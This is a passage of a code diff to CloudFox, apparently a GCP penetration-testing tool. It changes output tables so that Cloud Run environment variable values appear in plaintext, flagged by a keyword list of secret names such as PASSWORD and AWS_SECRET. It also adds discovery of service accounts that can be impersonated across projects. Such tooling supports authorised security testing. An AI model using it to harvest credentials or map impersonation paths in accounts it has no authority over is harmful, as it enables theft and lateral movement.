fmt.Sprintf("Yes (%d)", len(job.HardcodedSecrets)) - } lastExec := "-" if job.LastExecution != "" { lastExec = extractName(job.LastExecution) } + status := job.Status + if status == "" { + status = "-" + } + + vpcAccess := "-" + if job.VPCAccess != "" { + vpcAccess = extractName(job.VPCAccess) + if job.VPCEgressSettings != "" { + vpcAccess += fmt.Sprintf(" (%s)", strings.TrimPrefix(job.VPCEgressSettings, "VPC_EGRESS_")) + } + } + // Check attack paths (privesc/exfil/lateral) for the service account - jobAttackPaths := "-" + jobAttackPaths := "run --attack-paths" if m.AttackPathCache != nil && m.AttackPathCache.IsPopulated() { if job.ServiceAccount != "" { jobAttackPaths = m.AttackPathCache.GetAttackSummary(job.ServiceAccount) @@ -575,12 +555,25 @@ func (m *CloudRunModule) buildTablesForProject(projectID string, services []Clou } } - jobsBody = append(jobsBody, []string{ - job.ProjectID, m.GetProjectName(job.ProjectID), job.Name, job.Region, - job.ServiceAccount, jobAttackPaths, defaultSA, job.ContainerImage, - fmt.Sprintf("%d", job.TaskCount), fmt.Sprintf("%d", job.Parallelism), - lastExec, envVars, secrets, hardcoded, - }) + // If job has IAM bindings, create one row per binding + if len(job.IAMBindings) > 0 { + for _, binding := range job.IAMBindings { + jobsBody = append(jobsBody, []string{ + m.GetProjectName(job.ProjectID), "Job", job.Name, job.Region, status, + job.ServiceAccount, jobAttackPaths, defaultSA, job.ContainerImage, vpcAccess, + fmt.Sprintf("%d", job.TaskCount), fmt.Sprintf("%d", job.Parallelism), + lastExec, binding.Role, binding.Member, + }) + } + } else { + // Job has no IAM bindings - single row + jobsBody = append(jobsBody, []string{ + m.GetProjectName(job.ProjectID), "Job", job.Name, job.Region, status, + job.ServiceAccount, jobAttackPaths, defaultSA, job.ContainerImage, vpcAccess, + fmt.Sprintf("%d", job.TaskCount), fmt.Sprintf("%d", job.Parallelism), + lastExec, "-", "-", + }) + } } if len(jobsBody) > 0 { @@ -591,28 +584,44 @@ func (m *CloudRunModule) buildTablesForProject(projectID string, services []Clou }) } - // Hardcoded secrets table + // Secrets table (includes hardcoded secrets and environment variables) secretsHeader := []string{ - "Project ID", "Project Name", "Resource Type", "Name", "Region", "Env Var", "Secret Type", + "Project", "Resource Type", "Name", "Region", "Env Var", "Value/Type", "Source", "Sensitive", } var secretsBody [][]string + + // Add environment variables for _, svc := range services { - for _, secret := range svc.HardcodedSecrets { - secretsBody = append(secretsBody, []string{ - svc.ProjectID, m.GetProjectName(svc.ProjectID), "Service", - svc.Name, svc.Region, secret.EnvVarName, secret.SecretType, - }) - m.addSecretRemediationToLoot(svc.Name, svc.ProjectID, svc.Region, secret.EnvVarName, "service") + for _, env := range svc.EnvVars { + sensitive := isSensitiveEnvVar(env.Name) + if env.Source == "direct" { + secretsBody = append(secretsBody, []string{ + m.GetProjectName(svc.ProjectID), "Service", + svc.Name, svc.Region, env.Name, env.Value, "EnvVar", sensitive, + }) + } else { + secretsBody = append(secretsBody, []string{ + m.GetProjectName(svc.ProjectID), "Service", + svc.Name, svc.Region, env.Name, fmt.Sprintf("%s:%s", env.SecretName, env.SecretVersion), "SecretManager", sensitive, + }) + } } } for _, job := range jobs { - for _, secret := range job.HardcodedSecrets { - secretsBody = append(secretsBody, []string{ - job.ProjectID, m.GetProjectName(job.ProjectID), "Job", - job.Name, job.Region, secret.EnvVarName, secret.SecretType, - }) - m.addSecretRemediationToLoot(job.Name, job.ProjectID, job.Region, secret.EnvVarName, "job") + for _, env := range job.EnvVars { + sensitive := isSensitiveEnvVar(env.Name) + if env.Source == "direct" { + secretsBody = append(secretsBody, []string{ + m.GetProjectName(job.ProjectID), "Job", + job.Name, job.Region, env.Name, env.Value, "EnvVar", sensitive, + }) + } else { + secretsBody = append(secretsBody, []string{ + m.GetProjectName(job.ProjectID), "Job", + job.Name, job.Region, env.Name, fmt.Sprintf("%s:%s", env.SecretName, env.SecretVersion), "SecretManager", sensitive, + }) + } } } @@ -652,40 +661,26 @@ func extractName(fullName string) string { return fullName } -// addSecretRemediationToLoot adds remediation commands for hardcoded secrets -func (m *CloudRunModule) addSecretRemediationToLoot(resourceName, projectID, region, envVarName, resourceType string) { - secretName := strings.ToLower(strings.ReplaceAll(envVarName, "_", "-")) - - m.mu.Lock() - defer m.mu.Unlock() - - commandsLoot := m.LootMap[projectID]["cloudrun-commands"] - if commandsLoot == nil { - return - } - - commandsLoot.Contents += fmt.Sprintf( - "# CRITICAL: Migrate hardcoded secret %s from %s %s\n"+ - "# 1. Create secret in Secret Manager:\n"+ - "echo -n 'SECRET_VALUE' | gcloud secrets create %s --data-file=- --project=%s\n"+ - "# 2. Grant access to Cloud Run service account:\n"+ - "gcloud secrets add-iam-policy-binding %s --member='serviceAccount:SERVICE_ACCOUNT' --role='roles/secretmanager.secretAccessor' --project=%s\n", - envVarName, resourceType, resourceName, - secretName, projectID, - secretName, projectID, - ) +// sensitiveEnvVarPatterns contains patterns that indicate sensitive env vars +var sensitiveEnvVarPatterns = []string{ + "PASSWORD", "PASSWD", "SECRET", "API_KEY", "APIKEY", "API-KEY", + "TOKEN", "ACCESS_TOKEN", "AUTH_TOKEN", "BEARER", "CREDENTIAL", + "PRIVATE_KEY", "PRIVATEKEY", "CONNECTION_STRING", "CONN_STR", + "DATABASE_URL", "DB_PASSWORD", "DB_PASS", "MYSQL_PASSWORD", + "POSTGRES_PASSWORD", "REDIS_PASSWORD", "MONGODB_URI", + "AWS_ACCESS_KEY", "AWS_SECRET", "AZURE_KEY", "GCP_KEY", + "ENCRYPTION_KEY", "SIGNING_KEY", "JWT_SECRET", "SESSION_SECRET", + "OAUTH", "CLIENT_SECRET", +} - if resourceType == "service" { - commandsLoot.Contents += fmt.Sprintf( - "# 3. Update Cloud Run service to use secret:\n"+ - "gcloud run services update %s --update-secrets=%s=%s:latest --region=%s --project=%s\n\n", - resourceName, envVarName, secretName, region, projectID, - ) - } else { - commandsLoot.Contents += fmt.Sprintf( - "# 3. Update Cloud Run job to use secret:\n"+ - "gcloud run jobs update %s --update-secrets=%s=%s:latest --region=%s --project=%s\n\n", - resourceName, envVarName, secretName, region, projectID, - ) +// isSensitiveEnvVar checks if an environment variable name indicates sensitive data +func isSensitiveEnvVar(envName string) string { + envNameUpper := strings.ToUpper(envName) + for _, pattern := range sensitiveEnvVarPatterns { + if strings.Contains(envNameUpper, pattern) { + return "Yes" + } } + return "No" } + diff --git a/gcp/commands/composer.go b/gcp/commands/composer.go index 84504c4b..eb862530 100644 --- a/gcp/commands/composer.go +++ b/gcp/commands/composer.go @@ -183,7 +183,7 @@ func (m *ComposerModule) getTableHeader() []string { "Location", "State", "Service Account", - "Attack Paths", + "SA Attack Paths", "Private", "Private Endpoint", "Airflow URI", @@ -201,7 +201,7 @@ func (m *ComposerModule) environmentsToTableBody(environments []composerservice. } // Check attack paths (privesc/exfil/lateral) for the service account - attackPaths := "-" + attackPaths := "run --attack-paths" if m.AttackPathCache != nil && m.AttackPathCache.IsPopulated() { if sa != "(default)" && sa != "" { attackPaths = m.AttackPathCache.GetAttackSummary(sa) diff --git a/gcp/commands/crossproject.go b/gcp/commands/crossproject.go index d240fc48..8443e66d 100644 --- a/gcp/commands/crossproject.go +++ b/gcp/commands/crossproject.go @@ -24,6 +24,7 @@ This module is designed for penetration testing and identifies: - Potential lateral movement paths between projects - Cross-project logging sinks (data exfiltration via logs) - Cross-project Pub/Sub exports (data exfiltration via messages) +- Impersonation targets (which SAs can be impersonated in target projects) Features: - Maps cross-project service account access @@ -32,6 +33,16 @@ Features: - Discovers Pub/Sub subscriptions exporting to other projects (BQ, GCS, push) - Generates exploitation commands for lateral movement - Highlights service accounts spanning trust boundaries +- Shows impersonation targets when --attack-paths flag is used + +TIP: For a complete picture including impersonation targets and attack paths, +use the global --attack-paths flag: + + cloudfox gcp crossproject -l projects.txt --attack-paths + +This will populate the Target Type, Target Principal, and Attack Path columns +with detailed information about what service accounts can be impersonated and +what privesc/exfil/lateral movement capabilities exist. WARNING: Requires multiple projects to be specified for effective analysis. Use -p for single project or -l for project list file.`, @@ -50,6 +61,7 @@ type CrossProjectModule struct { CrossProjectSinks []crossprojectservice.CrossProjectLoggingSink CrossProjectPubSub []crossprojectservice.CrossProjectPubSubExport LootMap map[string]*internal.LootFile + AttackPathCache *gcpinternal.AttackPathCache } // ------------------------------ @@ -94,6 +106,19 @@ func runGCPCrossProjectCommand(cmd *cobra.Command, args []string) { // Module Execution // ------------------------------ func (m *CrossProjectModule) Execute(ctx context.Context, logger internal.Logger) { + // Get attack path cache from context (populated by all-checks or attack path analysis) + m.AttackPathCache = gcpinternal.GetAttackPathCacheFromContext(ctx) + + // If no context cache, try loading from disk cache + if m.AttackPathCache == nil || !m.AttackPathCache.IsPopulated() { + diskCache, metadata, err := gcpinternal.LoadAttackPathCacheFromFile(m.OutputDirectory, m.Account) + if err == nil && diskCache != nil && diskCache.IsPopulated() { + logger.InfoM(fmt.Sprintf("Using attack path cache from disk (created: %s)", + metadata.CreatedAt.Format("2006-01-02 15:04:05")), globals.GCP_CROSSPROJECT_MODULE_NAME) + m.AttackPathCache = diskCache + } + } + logger.InfoM(fmt.Sprintf("Analyzing cross-project access patterns across %d project(s)...", len(m.ProjectIDs)), globals.GCP_CROSSPROJECT_MODULE_NAME) svc := crossprojectservice.New() @@ -206,57 +231,6 @@ func (m *CrossProjectModule) addBindingToLoot(binding crossprojectservice.CrossP } } -// isCrossTenantPrincipal checks if a principal is from outside the organization -func isCrossTenantPrincipal(principal string, projectIDs []string) bool { - // Extract service account email - email := strings.TrimPrefix(principal, "serviceAccount:") - email = strings.TrimPrefix(email, "user:") - email = strings.TrimPrefix(email, "group:") - - // Check if the email domain is gserviceaccount.com (service account) - if strings.Contains(email, "@") && strings.Contains(email, ".iam.gserviceaccount.com") { - // Extract project from SA email - // Format: NAME@PROJECT.iam.gserviceaccount.com - parts := strings.Split(email, "@") - if len(parts) == 2 { - domain := parts[1] - saProject := strings.TrimSuffix(domain, ".iam.gserviceaccount.com") - - // Check if SA's project is in our project list - for _, p := range projectIDs { - if p == saProject { - return false // It's from within our organization - } - } - return true // External SA - } - } - - // Check for compute/appspot service accounts - if strings.Contains(email, "-compute@developer.gserviceaccount.com") || - strings.Contains(email, "@appspot.gserviceaccount.com") { - // Extract project number/ID - parts := strings.Split(email, "@") - if len(parts) == 2 { - projectPart := strings.Split(parts[0], "-")[0] - for _, p := range projectIDs { - if strings.Contains(p, projectPart) { - return false - } - } - return true - } - } - - // For regular users, check domain - if strings.Contains(email, "@") && !strings.Contains(email, "gserviceaccount.com") { - // Can't determine organization from email alone - return false - } - - return false -} - func (m *CrossProjectModule) addServiceAccountToLoot(sa crossprojectservice.CrossProjectServiceAccount) { // Add impersonation commands for cross-project SAs m.LootMap["crossproject-commands"].Contents += fmt.Sprintf( @@ -333,44 +307,177 @@ func (m *CrossProjectModule) writeOutput(ctx context.Context, logger internal.Lo func (m *CrossProjectModule) getHeader() []string { return []string{ - "Source Project Name", - "Source Project ID", - "Principal/Resource", - "Type", - "Action/Destination", - "Target Project Name", - "Target Project ID", - "External", + "Source Project", + "Source Type", + "Source Principal", + "Binding Type", + "Target Project", + "Target Type", + "Target Principal", + "Target Role", + "Attack Path", + } +} + +// getImpersonationTarget checks if a role grants impersonation capabilities and returns the target +// Returns (targetType, targetPrincipal) - both "-" if no impersonation target found +func (m *CrossProjectModule) getImpersonationTarget(principal, role, targetProject string) (string, string) { + // Roles that grant impersonation capabilities + impersonationRoles := map[string]bool{ + "roles/iam.serviceAccountTokenCreator": true, + "roles/iam.serviceAccountKeyAdmin": true, + "iam.serviceAccountTokenCreator": true, + "iam.serviceAccountKeyAdmin": true, + } + + cleanedRole := cleanRole(role) + + // Check if this is an impersonation role + if !impersonationRoles[role] && !impersonationRoles[cleanedRole] && + !strings.Contains(cleanedRole, "serviceAccountTokenCreator") && + !strings.Contains(cleanedRole, "serviceAccountKeyAdmin") { + return "-", "-" + } + + // Try to get impersonation targets from cache + if m.AttackPathCache != nil && m.AttackPathCache.IsPopulated() { + cleanedPrincipal := cleanPrincipal(principal) + targets := m.AttackPathCache.GetImpersonationTargets(cleanedPrincipal) + if len(targets) > 0 { + // Filter targets to those in the target project + var projectTargets []string + for _, t := range targets { + if strings.Contains(t, targetProject) { + projectTargets = append(projectTargets, t) + } + } + if len(projectTargets) > 0 { + if len(projectTargets) == 1 { + return "Service Account", projectTargets[0] + } + return "Service Account", fmt.Sprintf("%d SAs", len(projectTargets)) + } + // If no project-specific targets, show all targets + if len(targets) == 1 { + return "Service Account", targets[0] + } + return "Service Account", fmt.Sprintf("%d SAs", len(targets)) + } } + + // No specific targets found in cache - this likely means the role was granted at the + // project level (not on specific SAs), which means ALL SAs in the target project can be impersonated + return "Service Account", fmt.Sprintf("All SAs in %s", m.GetProjectName(targetProject)) +} + +// getPrincipalTypeDisplay returns a human-readable type for the principal +func getPrincipalTypeDisplay(principal string) string { + if strings.HasPrefix(principal, "serviceAccount:") { + return "Service Account" + } else if strings.HasPrefix(principal, "user:") { + return "User" + } else if strings.HasPrefix(principal, "group:") { + return "Group" + } else if strings.HasPrefix(principal, "domain:") { + return "Domain" + } + return "Unknown" } -func (m *CrossProjectModule) buildTableBody() [][]string { - var body [][]string +// cleanPrincipal removes common prefixes from principal strings for cleaner display +func cleanPrincipal(principal string) string { + // Remove serviceAccount:, user:, group: prefixes + principal = strings.TrimPrefix(principal, "serviceAccount:") + principal = strings.TrimPrefix(principal, "user:") + principal = strings.TrimPrefix(principal, "group:") + principal = strings.TrimPrefix(principal, "domain:") + return principal +} + +// cleanRole extracts just the role name from a full role path +func cleanRole(role string) string { + // Handle full project paths like "projects/project-id/roles/customRole" + if strings.Contains(role, "/roles/") { + parts := strings.Split(role, "/roles/") + if len(parts) == 2 { + return parts[1] + } + } + // Handle standard roles like "roles/compute.admin" + if strings.HasPrefix(role, "roles/") { + return strings.TrimPrefix(role, "roles/") + } + return role +} + +// extractCrossProjectResourceName extracts just the resource name from a full resource path +func extractCrossProjectResourceName(path string) string { + // Handle various path formats + parts := strings.Split(path, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return path +} + +// getAttackPathForTarget returns attack path summary for a principal accessing a target project +func (m *CrossProjectModule) getAttackPathForTarget(targetProject, principal string) string { + if m.AttackPathCache == nil || !m.AttackPathCache.IsPopulated() { + return "-" + } + + // Clean principal for lookup + cleanedPrincipal := cleanPrincipal(principal) + + // Check if this is a service account + if strings.Contains(cleanedPrincipal, "@") && strings.Contains(cleanedPrincipal, ".iam.gserviceaccount.com") { + return m.AttackPathCache.GetAttackSummary(cleanedPrincipal) + } + + return "-" +} + +func (m *CrossProjectModule) collectLootFiles() []internal.LootFile { + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + return lootFiles +} + +// buildTableBodyByTargetProject builds table bodies grouped by target project +// Returns a map of targetProjectID -> [][]string (rows for that target project) +func (m *CrossProjectModule) buildTableBodyByTargetProject() map[string][][]string { + bodyByProject := make(map[string][][]string) // Add cross-project bindings for _, binding := range m.CrossBindings { - external := "No" - if isCrossTenantPrincipal(binding.Principal, m.ProjectIDs) { - external = "Yes" - } + principalType := getPrincipalTypeDisplay(binding.Principal) + principal := cleanPrincipal(binding.Principal) + role := cleanRole(binding.Role) + attackPath := m.getAttackPathForTarget(binding.TargetProject, binding.Principal) + targetType, targetPrincipal := m.getImpersonationTarget(binding.Principal, binding.Role, binding.TargetProject) - body = append(body, []string{ + row := []string{ m.GetProjectName(binding.SourceProject), - binding.SourceProject, - binding.Principal, + principalType, + principal, "IAM Binding", - binding.Role, m.GetProjectName(binding.TargetProject), - binding.TargetProject, - external, - }) + targetType, + targetPrincipal, + role, + attackPath, + } + bodyByProject[binding.TargetProject] = append(bodyByProject[binding.TargetProject], row) } - // Add cross-project service accounts (one row per target access) + // Add cross-project service accounts for _, sa := range m.CrossProjectSAs { for _, access := range sa.TargetAccess { - // Parse access string (format: "project:role") - parts := strings.SplitN(access, ":", 2) + parts := strings.SplitN(access, ": ", 2) targetProject := "" role := access if len(parts) == 2 { @@ -378,110 +485,130 @@ func (m *CrossProjectModule) buildTableBody() [][]string { role = parts[1] } - body = append(body, []string{ + role = cleanRole(role) + attackPath := m.getAttackPathForTarget(targetProject, "serviceAccount:"+sa.Email) + targetType, targetPrincipal := m.getImpersonationTarget(sa.Email, role, targetProject) + + row := []string{ m.GetProjectName(sa.ProjectID), - sa.ProjectID, - sa.Email, "Service Account", - role, + sa.Email, + "IAM Binding", m.GetProjectName(targetProject), - targetProject, - "No", - }) + targetType, + targetPrincipal, + role, + attackPath, + } + bodyByProject[targetProject] = append(bodyByProject[targetProject], row) } } - // Add lateral movement paths (one row per target role) + // Add lateral movement paths for _, path := range m.LateralMovementPaths { for _, role := range path.TargetRoles { - body = append(body, []string{ + principalType := getPrincipalTypeDisplay(path.SourcePrincipal) + principal := cleanPrincipal(path.SourcePrincipal) + cleanedRole := cleanRole(role) + attackPath := m.getAttackPathForTarget(path.TargetProject, path.SourcePrincipal) + targetType, targetPrincipal := m.getImpersonationTarget(path.SourcePrincipal, role, path.TargetProject) + + row := []string{ m.GetProjectName(path.SourceProject), - path.SourceProject, - path.SourcePrincipal, - "Lateral Movement", - fmt.Sprintf("%s -> %s", path.AccessMethod, role), + principalType, + principal, + path.AccessMethod, m.GetProjectName(path.TargetProject), - path.TargetProject, - "No", - }) + targetType, + targetPrincipal, + cleanedRole, + attackPath, + } + bodyByProject[path.TargetProject] = append(bodyByProject[path.TargetProject], row) } } - // Add logging sinks + // Add logging sinks - these are resources, not principals for _, sink := range m.CrossProjectSinks { - filter := sink.Filter - if filter == "" { - filter = "(all logs)" + dest := sink.DestinationType + if sink.Filter != "" { + filter := sink.Filter + if len(filter) > 30 { + filter = filter[:27] + "..." + } + dest = fmt.Sprintf("%s (%s)", sink.DestinationType, filter) } - body = append(body, []string{ + row := []string{ m.GetProjectName(sink.SourceProject), - sink.SourceProject, - sink.SinkName, "Logging Sink", - fmt.Sprintf("%s: %s", sink.DestinationType, filter), + sink.SinkName, + "Data Export", m.GetProjectName(sink.TargetProject), - sink.TargetProject, - "No", - }) + "-", + "-", + dest, + "-", + } + bodyByProject[sink.TargetProject] = append(bodyByProject[sink.TargetProject], row) } - // Add Pub/Sub exports + // Add Pub/Sub exports - these are resources, not principals for _, export := range m.CrossProjectPubSub { - body = append(body, []string{ + dest := export.ExportType + if export.ExportDest != "" { + destName := extractCrossProjectResourceName(export.ExportDest) + dest = fmt.Sprintf("%s: %s", export.ExportType, destName) + } + + row := []string{ m.GetProjectName(export.SourceProject), - export.SourceProject, + "Pub/Sub", export.SubscriptionName, - "Pub/Sub Export", - fmt.Sprintf("%s -> %s", export.ExportType, export.ExportDest), + "Data Export", m.GetProjectName(export.TargetProject), - export.TargetProject, - "No", - }) - } - - return body -} - -func (m *CrossProjectModule) collectLootFiles() []internal.LootFile { - var lootFiles []internal.LootFile - for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { - lootFiles = append(lootFiles, *loot) + "-", + "-", + dest, + "-", } + bodyByProject[export.TargetProject] = append(bodyByProject[export.TargetProject], row) } - return lootFiles + + return bodyByProject } func (m *CrossProjectModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { - // For crossproject, output at project level since we're looking for entities accessing into each project + // For crossproject, output at project level grouped by TARGET project outputData := internal.HierarchicalOutputData{ OrgLevelData: make(map[string]internal.CloudfoxOutput), ProjectLevelData: make(map[string]internal.CloudfoxOutput), } header := m.getHeader() - body := m.buildTableBody() + bodyByProject := m.buildTableBodyByTargetProject() lootFiles := m.collectLootFiles() - var tables []internal.TableFile - if len(body) > 0 { - tables = append(tables, internal.TableFile{ - Name: "crossproject", - Header: header, - Body: body, - }) - } + // Create output for each target project + for targetProject, body := range bodyByProject { + if len(body) == 0 { + continue + } - output := CrossProjectOutput{ - Table: tables, - Loot: lootFiles, - } + tables := []internal.TableFile{ + { + Name: "crossproject", + Header: header, + Body: body, + }, + } - // Place at first project level (cross-project analysis spans multiple projects but we need a location) - // Use first project ID as the output location - if len(m.ProjectIDs) > 0 { - outputData.ProjectLevelData[m.ProjectIDs[0]] = output + output := CrossProjectOutput{ + Table: tables, + Loot: lootFiles, // Loot files are shared across all projects + } + + outputData.ProjectLevelData[targetProject] = output } pathBuilder := m.BuildPathBuilder() @@ -495,42 +622,43 @@ func (m *CrossProjectModule) writeHierarchicalOutput(ctx context.Context, logger func (m *CrossProjectModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { header := m.getHeader() - body := m.buildTableBody() + bodyByProject := m.buildTableBodyByTargetProject() lootFiles := m.collectLootFiles() - var tables []internal.TableFile - if len(body) > 0 { - tables = append(tables, internal.TableFile{ - Name: "crossproject", - Header: header, - Body: body, - }) - } + // Write output for each target project separately + for targetProject, body := range bodyByProject { + if len(body) == 0 { + continue + } - output := CrossProjectOutput{ - Table: tables, - Loot: lootFiles, - } + tables := []internal.TableFile{ + { + Name: "crossproject", + Header: header, + Body: body, + }, + } - scopeNames := make([]string, len(m.ProjectIDs)) - for i, id := range m.ProjectIDs { - scopeNames[i] = m.GetProjectName(id) - } + output := CrossProjectOutput{ + Table: tables, + Loot: lootFiles, + } - err := internal.HandleOutputSmart( - "gcp", - m.Format, - m.OutputDirectory, - m.Verbosity, - m.WrapTable, - "project", - m.ProjectIDs, - scopeNames, - m.Account, - output, - ) - if err != nil { - logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_CROSSPROJECT_MODULE_NAME) - m.CommandCounter.Error++ + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + []string{targetProject}, + []string{m.GetProjectName(targetProject)}, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output for project %s: %v", targetProject, err), globals.GCP_CROSSPROJECT_MODULE_NAME) + m.CommandCounter.Error++ + } } } diff --git a/gcp/commands/dataexfiltration.go b/gcp/commands/dataexfiltration.go index 94f8c843..3907fd1b 100644 --- a/gcp/commands/dataexfiltration.go +++ b/gcp/commands/dataexfiltration.go @@ -18,9 +18,7 @@ import ( gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/spf13/cobra" - cloudfunctions "google.golang.org/api/cloudfunctions/v1" compute "google.golang.org/api/compute/v1" - run "google.golang.org/api/run/v1" sqladmin "google.golang.org/api/sqladmin/v1" storage "google.golang.org/api/storage/v1" storagetransfer "google.golang.org/api/storagetransfer/v1" @@ -77,15 +75,6 @@ type ExfiltrationPath struct { VPCSCProtected bool // Is this project protected by VPC-SC? } -// PotentialVector represents a potential exfiltration capability (not necessarily misconfigured) -type PotentialVector struct { - VectorType string // Category: BigQuery Export, Pub/Sub, Cloud Function, etc. - ResourceName string // Specific resource or "*" for generic - ProjectID string // Project ID - Description string // What this vector enables - Destination string // Where data could go - ExploitCommand string // Command to exploit this vector -} type PublicExport struct { ResourceType string @@ -112,15 +101,6 @@ type OrgPolicyProtection struct { MissingProtections []string } -// MissingHardening represents a security configuration that should be enabled -type MissingHardening struct { - ProjectID string - Category string // Storage, BigQuery, Compute, etc. - Control string // Org policy or configuration name - Description string // What this protects against - Recommendation string // How to enable it -} - // PermissionBasedExfilPath is replaced by attackpathservice.AttackPath for centralized handling // ------------------------------ @@ -129,14 +109,14 @@ type MissingHardening struct { type DataExfiltrationModule struct { gcpinternal.BaseGCPModule - ProjectExfiltrationPaths map[string][]ExfiltrationPath // projectID -> paths - ProjectPotentialVectors map[string][]PotentialVector // projectID -> vectors + ProjectExfiltrationPaths map[string][]ExfiltrationPath // projectID -> paths ProjectPublicExports map[string][]PublicExport // projectID -> exports ProjectAttackPaths map[string][]attackpathservice.AttackPath // projectID -> permission-based attack paths LootMap map[string]map[string]*internal.LootFile // projectID -> loot files mu sync.Mutex vpcscProtectedProj map[string]bool // Projects protected by VPC-SC orgPolicyProtection map[string]*OrgPolicyProtection // Org policy protections per project + usedAttackPathCache bool // Whether attack paths were loaded from cache } // ------------------------------ @@ -162,7 +142,6 @@ func runGCPDataExfiltrationCommand(cmd *cobra.Command, args []string) { module := &DataExfiltrationModule{ BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), ProjectExfiltrationPaths: make(map[string][]ExfiltrationPath), - ProjectPotentialVectors: make(map[string][]PotentialVector), ProjectPublicExports: make(map[string][]PublicExport), ProjectAttackPaths: make(map[string][]attackpathservice.AttackPath), LootMap: make(map[string]map[string]*internal.LootFile), @@ -184,13 +163,6 @@ func (m *DataExfiltrationModule) getAllExfiltrationPaths() []ExfiltrationPath { return all } -func (m *DataExfiltrationModule) getAllPotentialVectors() []PotentialVector { - var all []PotentialVector - for _, vectors := range m.ProjectPotentialVectors { - all = append(all, vectors...) - } - return all -} func (m *DataExfiltrationModule) getAllPublicExports() []PublicExport { var all []PublicExport @@ -211,49 +183,139 @@ func (m *DataExfiltrationModule) getAllAttackPaths() []attackpathservice.AttackP func (m *DataExfiltrationModule) Execute(ctx context.Context, logger internal.Logger) { logger.InfoM("Identifying data exfiltration paths and potential vectors...", GCP_DATAEXFILTRATION_MODULE_NAME) + var usedCache bool + + // Check if attack path analysis was already run (via --attack-paths flag) + if cache := gcpinternal.GetAttackPathCacheFromContext(ctx); cache != nil && cache.HasRawData() { + if cachedResult, ok := cache.GetRawData().(*attackpathservice.CombinedAttackPathData); ok { + logger.InfoM("Using cached attack path analysis results for permission-based paths", GCP_DATAEXFILTRATION_MODULE_NAME) + m.loadAttackPathsFromCache(cachedResult) + usedCache = true + } + } + + // If no context cache, try loading from disk cache + if !usedCache { + diskCache, metadata, err := gcpinternal.LoadAttackPathCacheFromFile(m.OutputDirectory, m.Account) + if err == nil && diskCache != nil && diskCache.HasRawData() { + if cachedResult, ok := diskCache.GetRawData().(*attackpathservice.CombinedAttackPathData); ok { + logger.InfoM(fmt.Sprintf("Using disk cache for permission-based paths (created: %s)", + metadata.CreatedAt.Format("2006-01-02 15:04:05")), GCP_DATAEXFILTRATION_MODULE_NAME) + m.loadAttackPathsFromCache(cachedResult) + usedCache = true + } + } + } + // First, check VPC-SC protection status for all projects m.checkVPCSCProtection(ctx, logger) // Check organization policy protections for all projects m.checkOrgPolicyProtection(ctx, logger) - // Analyze org and folder level exfil paths (runs once for all projects) - m.analyzeOrgFolderExfilPaths(ctx, logger) + // If we didn't use cache, analyze org and folder level exfil paths + if !usedCache { + m.analyzeOrgFolderExfilPaths(ctx, logger) + } - // Process each project + // Process each project - this always runs to find actual misconfigurations + // (public buckets, snapshots, etc.) but skip permission-based analysis if cached + m.usedAttackPathCache = usedCache m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, GCP_DATAEXFILTRATION_MODULE_NAME, m.processProject) - // Generate hardening recommendations - hardeningRecs := m.generateMissingHardeningRecommendations() + // If we ran new analysis, save to cache (skip if running under all-checks) + if !usedCache { + m.saveToAttackPathCache(ctx, logger) + } allPaths := m.getAllExfiltrationPaths() - allVectors := m.getAllPotentialVectors() allPermBasedPaths := m.getAllAttackPaths() // Check results - hasResults := len(allPaths) > 0 || len(allVectors) > 0 || len(hardeningRecs) > 0 || len(allPermBasedPaths) > 0 + hasResults := len(allPaths) > 0 || len(allPermBasedPaths) > 0 if !hasResults { - logger.InfoM("No data exfiltration paths, vectors, or hardening gaps found", GCP_DATAEXFILTRATION_MODULE_NAME) + logger.InfoM("No data exfiltration paths found", GCP_DATAEXFILTRATION_MODULE_NAME) return } if len(allPaths) > 0 { logger.SuccessM(fmt.Sprintf("Found %d actual misconfiguration(s)", len(allPaths)), GCP_DATAEXFILTRATION_MODULE_NAME) } - if len(allVectors) > 0 { - logger.SuccessM(fmt.Sprintf("Found %d potential exfiltration vector(s)", len(allVectors)), GCP_DATAEXFILTRATION_MODULE_NAME) - } if len(allPermBasedPaths) > 0 { logger.SuccessM(fmt.Sprintf("Found %d permission-based exfiltration path(s)", len(allPermBasedPaths)), GCP_DATAEXFILTRATION_MODULE_NAME) } - if len(hardeningRecs) > 0 { - logger.InfoM(fmt.Sprintf("Found %d hardening recommendation(s)", len(hardeningRecs)), GCP_DATAEXFILTRATION_MODULE_NAME) - } m.writeOutput(ctx, logger) } +// loadAttackPathsFromCache loads exfil attack paths from cached data +func (m *DataExfiltrationModule) loadAttackPathsFromCache(data *attackpathservice.CombinedAttackPathData) { + // Filter to only include exfil paths and organize by project + for _, path := range data.AllPaths { + if path.PathType == "exfil" { + if path.ScopeType == "project" && path.ScopeID != "" { + m.ProjectAttackPaths[path.ScopeID] = append(m.ProjectAttackPaths[path.ScopeID], path) + } else if path.ScopeType == "organization" || path.ScopeType == "folder" { + // Distribute org/folder paths to all enumerated projects + for _, projectID := range m.ProjectIDs { + pathCopy := path + pathCopy.ProjectID = projectID + m.ProjectAttackPaths[projectID] = append(m.ProjectAttackPaths[projectID], pathCopy) + } + } + } + } +} + +// saveToAttackPathCache saves attack path data to disk cache +func (m *DataExfiltrationModule) saveToAttackPathCache(ctx context.Context, logger internal.Logger) { + // Skip saving if running under all-checks (consolidated save happens at the end) + if gcpinternal.IsAllChecksMode(ctx) { + logger.InfoM("Skipping individual cache save (all-checks mode)", GCP_DATAEXFILTRATION_MODULE_NAME) + return + } + + // Run full analysis (all types) so we can cache for other modules + svc := attackpathservice.New() + fullResult, err := svc.CombinedAttackPathAnalysis(ctx, m.ProjectIDs, m.ProjectNames, "all") + if err != nil { + logger.InfoM(fmt.Sprintf("Could not run full attack path analysis for caching: %v", err), 